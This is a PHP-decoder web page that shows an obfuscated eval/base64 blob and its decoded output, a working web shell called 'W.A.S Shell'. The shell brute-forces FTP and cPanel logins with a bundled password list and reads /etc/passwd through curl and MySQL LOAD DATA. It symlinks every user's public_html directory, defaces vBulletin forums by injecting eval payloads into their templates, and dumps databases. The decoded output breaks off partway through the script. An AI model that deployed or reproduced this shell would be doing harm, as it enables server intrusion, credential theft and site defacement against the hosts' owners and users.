Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<? eval(gzinflate(base64_decode(' 7b15Xxs58jj89/D58B6UHnbbnhjjA3PGJGAMMeGK zZEQ8vW23Y3dw..
Decoded Output download
?><?php
$head = '<!-- Edited by W.A.S -->
<html>
<head>
</script>
<title>o--{ W.A.S Shell }--o</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE>
body {
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border : dashed 1px;
border-color : #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
select {
BORDER-RIGHT: Black 1px solid;
BORDER-TOP: #DF0000 1px solid;
BORDER-LEFT: #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border : dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin : -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}
A:link {
COLOR: White; TEXT-DECORATION: none
}
A:visited {
COLOR: White; TEXT-DECORATION: none
}
A:hover {
color: Red; TEXT-DECORATION: none
}
A:active {
color: Red; TEXT-DECORATION: none
}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>';
if (isset($_GET['ln'])) {
$fp = fopen('passwd.txt','r');
$fr = fread($fp,filesize('passwd.txt'));
fclose($fp);
preg_match_all('/(.+?):x:(.+?)/',$fr,$explode);
foreach($explode[1] as $user) {
system("ln -s /home/$user/public_html/ $user");
}
header("Location: ".$_SERVER['PHP_SELF']);
}
if (isset($_GET['brute'])) {
?>
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
</head>
<title>/ W.A.S @ BruteForcer v1.0 /</title>
<style>
body{margin:0px;font-style:normal;font-size:10px;color:#fff;font-family:Verdana,Arial;background-color:#000;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}
input,
.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
button{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
a:active { outline: none; }
a:focus { -moz-outline-style: none; }
table {
border: 2px dashed #fff;
background:#000;
color: #fff;
font-weight: bold;
font-family:"Comic Sans MS";
}
</style>
<style type='text/css'>
<!--
A:link {text-decoration: none; color:#cccccc }
A:visited {text-decoration: none; color:#cccccc }
a:hover {text-decoration: none; color:Red}
-->
</style>
<?php
@ini_set('memory_limit', 1000000000000);
$connect_timeout=5;
@set_time_limit(0);
$submit = $_REQUEST['submit'];
$users = $_REQUEST['users'];
$pass = $_REQUEST['passwords'];
$target = $_REQUEST['target'];
$option = $_REQUEST['option'];
$page = $_GET['page'];
if($target == ''){
$target = 'localhost';
}
?>
<?php
print "<br><br><br><center><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='70%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td width='70%'>
<br><b><center><a href='?'>Home</a> - <a href='?brute&page=bio'> About </a> - <a href='?brute&page=crack'> Brute </a> - <a href='?brute&page=users'> Get users </a><br><br></center></td></tr></table>";
if ( $page == 'bio' ){
print
"<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td><br><center><pre>_____ ___ _ _ _
\ ___/ _ \ _| |_ __ _ _| | __| | __ _ _ __ ___ __ _
/ _|| (_) |__ | '_ \| | | | |/ _` |/ _` | '_ \ / _ ' _` |
| (__| .__/ _| | |_) | |_| | | | | | | | | |_) | | | | | |
\____\_\ |__/|_.__/|_.__/|_|_| |_|_| |_|_.__/|_| |_| |_|
</pre><br><b>###################################<br><font color=Red>/ W.A.S @ BruteForcer v1.0 /</font><br><font color=#FFCC00>/ [Edited] by W.A.S /</font></b><br>###################################</center></center><br></td></tr></table>";
exit();
}elseif( $page == 'crack'){
@ini_set('memory_limit', 1000000000000);
$connect_timeout=5;
@set_time_limit(0);
$submit = $_REQUEST['submit'];
$users = $_REQUEST['users'];
$pass = $_REQUEST['passwords'];
$target = $_REQUEST['target'];
$option = $_REQUEST['option'];
if($target == ''){
$target = 'localhost';
}
print " <div align='center'>
<form method='post' style='border: 1px solid #000000'><br><br>
<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td>
<b> Target : </font><input type='text' name='target' size='16' value= $target style='border: font-family:Verdana; font-weight:bold;'></p></font></b></p>
<div align='center'><br>
<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
<tr>
<td align='center'>
<b>Username</b></td>
<td>
<p align='center'>
<b>Password</b></td>
</tr>
</table>
<p align='center'>
<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$users</textarea>
<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>123pass
pass123
0123456
01234567
012345678
0123456789
01234567890
123456
1234567
12345678
123456789
1234567890
111111
000000
222222
333333
444444
555555
666666
777777
888888
999999
111111
000000
123123
456456
789789
123321
456654
654321
7654321
87654321
987654321
0987654321
admin123
123admin
admin123456
123456admin
1234554321
12344321
abcdef
abcabc
!@#!@#
!@#$%^
!@#$%^&*(
!@#$$#@!</textarea><br>
<br>
<b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='brute' name='submit' ></p>
</td></tr></table></td></tr></form><p align= 'left'>";
?>
<?php
function ftp_check($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "ftp://$host");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {
print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
exit;}
elseif ( curl_errno($ch) == 0 ){
if ($host == 'localhost') {
$link = "ftp://$user:$pass@".$_SERVER['SERVER_ADDR'];
} else {
$link = "ftp://$user:$pass@".$host;
}
print "<b><font color=Red> $user </font> | <font color=Red> $pass </font> [ <a href='$link'>$link</a> ]</b><br>";}curl_close($ch);}
function cpanel_check($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {
print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
exit;}
elseif ( curl_errno($ch) == 0 ){
if ($host == 'localhost') {
$link = "http://$user:$pass@".$_SERVER['SERVER_ADDR'].":2082";
} else {
$link = "http://$user:$pass@".$host.":2082";
}
print "<b><font color=Red> $user </font> | <font color=Red> $pass </font> [ <a href='$link'>$link</a> ]</b><br>";}curl_close($ch);}
if(isset($submit) && !empty($submit)){
$userlist = explode ("\n" , $users );
$passlist = explode ("\n" , $pass );
print "<b>[ W.A.S ]# Attacking ...</font></b><br><br>";
foreach ($userlist as $user) {
$_user = trim($user);
foreach ($passlist as $password ) {
$_pass = trim($password);
if($option == "ftp"){
ftp_check($target,$_user,$_pass,$connect_timeout);
}
if ($option == "cpanel")
{
cpanel_check($target,$_user,$_pass,$connect_timeout);
}
}
}
print "<br><b>[ W.A.S ]# Finished ...</font></b><br>";
}
exit();
}elseif ( $page == 'users'){
echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>";
echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="50" value="/etc/passwd"><input type="submit" name="hardstylez" value="Get !"></form>';
$file = $_POST['file'];
$level=0;
if(!file_exists("file:"))
@mkdir("file:");
@chdir("file:");
$level++;
$hardstyle = @explode("/", $file);
for($a=0;$a<count($hardstyle);$a++){
if(!empty($hardstyle[$a])){
if(!file_exists($hardstyle[$a]))
@mkdir($hardstyle[$a]);
@chdir($hardstyle[$a]);
$level++;
}
}
while($level--) chdir("..");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result = curl_exec($ch);
echo "<textarea rows='30' cols='120' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
if ($result == FALSE)
{ die("Failed!");
} else {
if (preg_match_all('/(.+?):x:(.+?)/',$result,$explode)) {
foreach($explode[1] as $user) {echo $user."\n";}
} else { echo $result;}
}
echo ' </textarea> </FONT>';
curl_close($ch);
print '</table>';
exit();
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
exit();
}
if(isset($_GET['deface'])) {echo $head; echo "
<title># W.A.S # | vBulletin Deface</title>
<style type='text/css'>
.style1 {
color: #FFFFFF;
}
.style2 {
font-family: Arial;
color: #FFFFFF;
}
.style3 {
text-align: center;
}
.style4 {
font-family: Arial;
}
</style>
</head>
<center>
<h2 class='style1'># W.A.S # | vBulletin Deface</h2><div id=haberler align=left><form method=POST action=''>
<p align=center class='style1'> </p>
<div class='style3'>
<span class='style2'>Host</span><font face='Arial' color='#ffffff'>:</font><span class='style1'> <input type=text name=dbh value=localhost size='15' ></span>
<font face='Arial' color='#ffffff'> Database Name:</font><span class='style1'><input type=text name=dbn size='15' ><br>
Database User</span><font face='Arial' color='#ffffff'>:</font><span class='style1'><input type=text name=dbu size='15' ></span>
<font face='Arial' color='#ffffff'> Database Pass: </font><span class='style1'><input type=text name=dbp size='16' ><br>
</span>
</div>
<center class='style1'>
<textarea name=index rows='5' cols='33' >echo '! Checked by W.A.S !';</textarea></center>
<center class='style1'><input type=submit value='Deface It!!!' ></form></center></center></body>
</center>
</html>";
$h4cker="[Edited] by W.A.S";
if (!empty($_POST['dbh']) && !empty($_POST['dbn']) && !empty($_POST['dbu']) && !empty($_POST['index']))
{
$dbh = $_POST['dbh'];
$dbn = $_POST['dbn'];
$dbu = $_POST['dbu'];
$dbp = $_POST['dbp'];
$index=str_replace("\'","'",$index);
$set_index = "{\${eval(base64_decode(\'".base64_encode($index);
//$set_index .= base64_encode("eval ('$index');");
$set_index .= "\'))}}{\${exit()}}";
mysql_connect($dbh,$dbu,$dbp) or die(mysql_error());
mysql_select_db($dbn) or die(mysql_error());
$fatal1 = "UPDATE template SET template='".$set_index."".$h4cker."' WHERE title='spacer_open'";
$fatal2 = "UPDATE template SET template='".$set_index."".$h4cker."' WHERE title='FORUMHOME'";
$fatal3 = "UPDATE style SET css='".$set_index."".$h4cker."', stylevars='', csscolors='', editorstyles=''";
$result = mysql_query($fatal1) or die (mysql_error());
$result2 = mysql_query($fatal2) or die (mysql_error());
$result3 = mysql_query($fatal3) or die (mysql_error());
if ($result && $result2 && $result3) {
echo "Okie";
}
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">HOME</a> ]</b></font></div>"; die();}
$language='eng';
$auth = 0;
error_reporting(E_ALL);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
$version = 'W.A.S Edition';
$footer = '<div align=center><font face=Verdana size=-2><b>o---{ W.A.S Shell }---o</b></font></div>';
if(version_compare(phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
$_COOKIE = &$HTTP_COOKIE_VARS;
}
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_COOKIE as $k=>$v)
{
$_COOKIE[$k] = stripslashes($v);
}
}
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!= $name || md5($_SERVER['PHP_AUTH_PW'])!= $pass)
{
header('WWW-Authenticate: Basic realm="W.A.S - CGG"');
header('HTTP/1.0 401 Unauthorized');
exit("<b>Contact <a href=http://xgroupvn.org/ </a> : Access Denied</b>");
}
}
class zipfile
{
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function addFile($data, $name, $time = 0)
{
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$this -> datasec[] = $fr;
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset += strlen($fr);
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file()
{
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return
$data .
$ctrldir .
$this -> eof_ctrl_dir .
pack('v', sizeof($this -> ctrl_dir)) .
pack('v', sizeof($this -> ctrl_dir)) .
pack('V', strlen($ctrldir)) .
pack('V', strlen($data)) .
"\x00\x00";
}
}
function compress(&$filename,&$filedump,$compress)
{
global $content_encoding;
global $mime_type;
if ($compress == 'bzip' && @function_exists('bzcompress'))
{
$filename .= '.bz2';
$mime_type = 'application/x-bzip2';
$filedump = bzcompress($filedump);
}
else if ($compress == 'gzip' && @function_exists('gzencode'))
{
$filename .= '.gz';
$content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip';
$filedump = gzencode($filedump);
}
else if ($compress == 'zip' && @function_exists('gzcompress'))
{
$filename .= '.zip';
$mime_type = 'application/zip';
$zipfile = new zipfile();
$zipfile -> addFile($filedump, substr($filename, 0, -4));
$filedump = $zipfile -> file();
}
else
{
$mime_type = 'application/octet-stream';
}
}
function mailattach($to,$from,$subj,$attach)
{
$headers = "From: $from\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: ".$attach['type'];
$headers .= "; name=\"".$attach['name']."\"\r\n";
$headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
$headers .= chunk_split(base64_encode($attach['content']))."\r\n";
if(@mail($to,$subj,"",$headers)) { return 1; }
return 0;
}
class my_sql
{
var $host = 'localhost';
var $port = '';
var $user = '';
var $pass = '';
var $base = '';
var $db = '';
var $connection;
var $res;
var $error;
var $rows;
var $columns;
var $num_rows;
var $num_fields;
var $dump;
function connect()
{
switch($this->db)
{
case 'MySQL':
if(empty($this->port)) { $this->port = '3306'; }
if(!function_exists('mysql_connect')) return 0;
$this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
if(is_resource($this->connection)) return 1;
break;
case 'MSSQL':
if(empty($this->port)) { $this->port = '1433'; }
if(!function_exists('mssql_connect')) return 0;
$this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
if($this->connection) return 1;
break;
case 'PostgreSQL':
if(empty($this->port)) { $this->port = '5432'; }
$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
if(!function_exists('pg_connect')) return 0;
$this->connection = @pg_connect($str);
if(is_resource($this->connection)) return 1;
break;
case 'Oracle':
if(!function_exists('ocilogon')) return 0;
$this->connection = @ocilogon($this->user, $this->pass, $this->base);
if(is_resource($this->connection)) return 1;
break;
}
return 0;
}
function select_db()
{
switch($this->db)
{
case 'MySQL':
if(@mysql_select_db($this->base,$this->connection)) return 1;
break;
case 'MSSQL':
if(@mssql_select_db($this->base,$this->connection)) return 1;
break;
case 'PostgreSQL':
return 1;
break;
case 'Oracle':
return 1;
break;
}
return 0;
}
function query($query)
{
$this->res=$this->error='';
switch($this->db)
{
case 'MySQL':
if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
{
$this->error = @mysql_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'MSSQL':
if(false===($this->res=@mssql_query($query,$this->connection)))
{
$this->error = 'Query error';
return 0;
}
else if(@mssql_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'PostgreSQL':
if(false===($this->res=@pg_query($this->connection,$query)))
{
$this->error = @pg_last_error($this->connection);
return 0;
}
else if(@pg_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'Oracle':
if(false===($this->res=@ociparse($this->connection,$query)))
{
$this->error = 'Query parse error';
}
else
{
if(@ociexecute($this->res))
{
if(@ocirowcount($this->res) != 0) return 2;
return 1;
}
$error = @ocierror();
$this->error=$error['message'];
}
break;
}
return 0;
}
function get_result()
{
$this->rows=array();
$this->columns=array();
$this->num_rows=$this->num_fields=0;
switch($this->db)
{
case 'MySQL':
$this->num_rows=@mysql_num_rows($this->res);
$this->num_fields=@mysql_num_fields($this->res);
while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
@mysql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'MSSQL':
$this->num_rows=@mssql_num_rows($this->res);
$this->num_fields=@mssql_num_fields($this->res);
while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
@mssql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
break;
case 'PostgreSQL':
$this->num_rows=@pg_num_rows($this->res);
$this->num_fields=@pg_num_fields($this->res);
while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
@pg_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'Oracle':
$this->num_fields=@ocinumcols($this->res);
while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
@ocifreestatement($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
}
return 0;
}
function dump($table)
{
if(empty($table)) return 0;
$this->dump=array();
$this->dump[0] = '##';
$this->dump[1] = '## --------------------------------------- ';
$this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
$this->dump[3] = '## Database: '.$this->base;
$this->dump[4] = '## Table: '.$table;
$this->dump[5] = '## --------------------------------------- ';
switch($this->db)
{
case 'MySQL':
$this->dump[0] = '## MySQL dump';
if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
if(!$this->get_result()) return 0;
$this->dump[] = $this->rows[0]['Create Table'];
$this->dump[] = '## --------------------------------------- ';
if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
$this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'MSSQL':
$this->dump[0] = '## MSSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'PostgreSQL':
$this->dump[0] = '## PostgreSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'Oracle':
$this->dump[0] = '## ORACLE dump';
$this->dump[] = '## under construction';
break;
default:
return 0;
break;
}
return 1;
}
function close()
{
switch($this->db)
{
case 'MySQL':
@mysql_close($this->connection);
break;
case 'MSSQL':
@mssql_close($this->connection);
break;
case 'PostgreSQL':
@pg_close($this->connection);
break;
case 'Oracle':
@oci_close($this->connection);
break;
}
}
function affected_rows()
{
switch($this->db)
{
case 'MySQL':
return @mysql_affected_rows($this->res);
break;
case 'MSSQL':
return @mssql_affected_rows($this->res);
break;
case 'PostgreSQL':
return @pg_affected_rows($this->res);
break;
case 'Oracle':
return @ocirowcount($this->res);
break;
default:
return 0;
break;
}
}
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
{
if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
else
{
@ob_clean();
$filename = @basename($_POST['d_name']);
$filedump = @fread($file,@filesize($_POST['d_name']));
fclose($file);
$content_encoding=$mime_type='';
compress($filename,$filedump,$_POST['compress']);
if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
header("Content-type: ".$mime_type);
header("Content-disposition: attachment; filename=\"".$filename."\";");
echo $filedump;
exit();
}
}
if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
{
echo $head;
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
$querys = @explode(';',$_POST['db_query']);
echo '<body bgcolor=Black>';
if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=#DF0000><b>Can't connect to SQL server</b></font></div>";
else
{
if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=#DF0000><b>Can't select database</b></font></div>";
else
{
foreach($querys as $num=>$query)
{
if(strlen($query)>5)
{
echo "<font face=Verdana size=-2 color=#DF0000><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
switch($sql->query($query))
{
case '0':
echo "<table width=100%><tr><td class=main><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
break;
case '1':
if($sql->get_result())
{
echo "<table width=100% border=0 cellpadding=0 cellspacing=0>";
foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
$keys = @implode(" </b></font></td><td class=main><font face=Verdana size=-2><b> ", $sql->columns);
echo "<tr><td class=main bgcolor=#333333><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
for($i=0;$i<$sql->num_rows;$i++)
{
foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
$values = @implode(" </font></td><td class=main><font face=Verdana size=-2> ",$sql->rows[$i]);
echo '<tr><td class=main><font face=Verdana size=-2> '.$values.' </font></td></tr>';
}
echo "</table>";
}
break;
case '2':
$ar = $sql->affected_rows()?($sql->affected_rows()):('0');
echo "<table width=100%><tr><td class=main><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
break;
}
}
}
}
echo "<br><div align=left id='n'><table width=100% height=60 border=0 cellpadding=0 cellspacing=0>";
echo "<tr><td align=center><b>Show Database</b></td><td align=center><b>Show Tables</b></td></tr>";
echo "<tr><td><textarea cols=50 rows=6 name=query_db>";
$query_db = mysql_query("SHOW DATABASES;");
while ($query_db_row = mysql_fetch_array($query_db))
{
echo $query_db_row[0]."\n";
}
echo "</textarea></td><td><div align=right><textarea cols=60 rows=6 name=query_tables>";
if (($_POST['mysql_db']) && $sql->select_db())
{
$query_tables = mysql_query("SHOW TABLES;");
while ($query_tables_row = mysql_fetch_array($query_tables))
{
echo $query_tables_row[0]."\n";
}
}
echo "</textarea></div></td></tr></table></div>";
}
echo "<br><form name=form method=POST>";
echo in('hidden','db',0,$_POST['db']);
echo in('hidden','db_server',0,$_POST['db_server']);
echo in('hidden','db_port',0,$_POST['db_port']);
echo in('hidden','mysql_l',0,$_POST['mysql_l']);
echo in('hidden','mysql_p',0,$_POST['mysql_p']);
echo in('hidden','mysql_db',0,$_POST['mysql_db']);
echo in('hidden','cmd',0,'db_query');
echo "<div align=center>";
echo "<font face=Verdana size=-2><b>Use database: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
echo "<div align=center><font face=Verdana size=-2><b>Load file: </b><input type=text name=loadfile size=100 value=".(!empty($_POST['loadfile'])?($_POST['loadfile']):("/etc/passwd")).">".ws(2)."<input type=submit name=submit value=\" Load \"><br /><br />";
echo "<b>File content</b><br><br>";
echo "<textarea cols=121 rows=15 name=showloadfile>";
@mysql_query("DROP TABLE IF EXISTS UnKn0wN");
@mysql_query("CREATE TABLE `UnKn0wN` ( `file` LONGBLOB NOT NULL )");
@mysql_query("LOAD DATA LOCAL INFILE \"".str_replace('\\','/',$_POST['loadfile'])."\" INTO TABLE UnKn0wN FIELDS TERMINATED BY '' ESCAPED BY '' LINES TERMINATED BY '\n'");
$r = @mysql_query("SELECT * FROM UnKn0wN");
while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
@mysql_query("DROP TABLE IF EXISTS UnKn0wN");
echo "</textarea></div>";
echo "</form>";
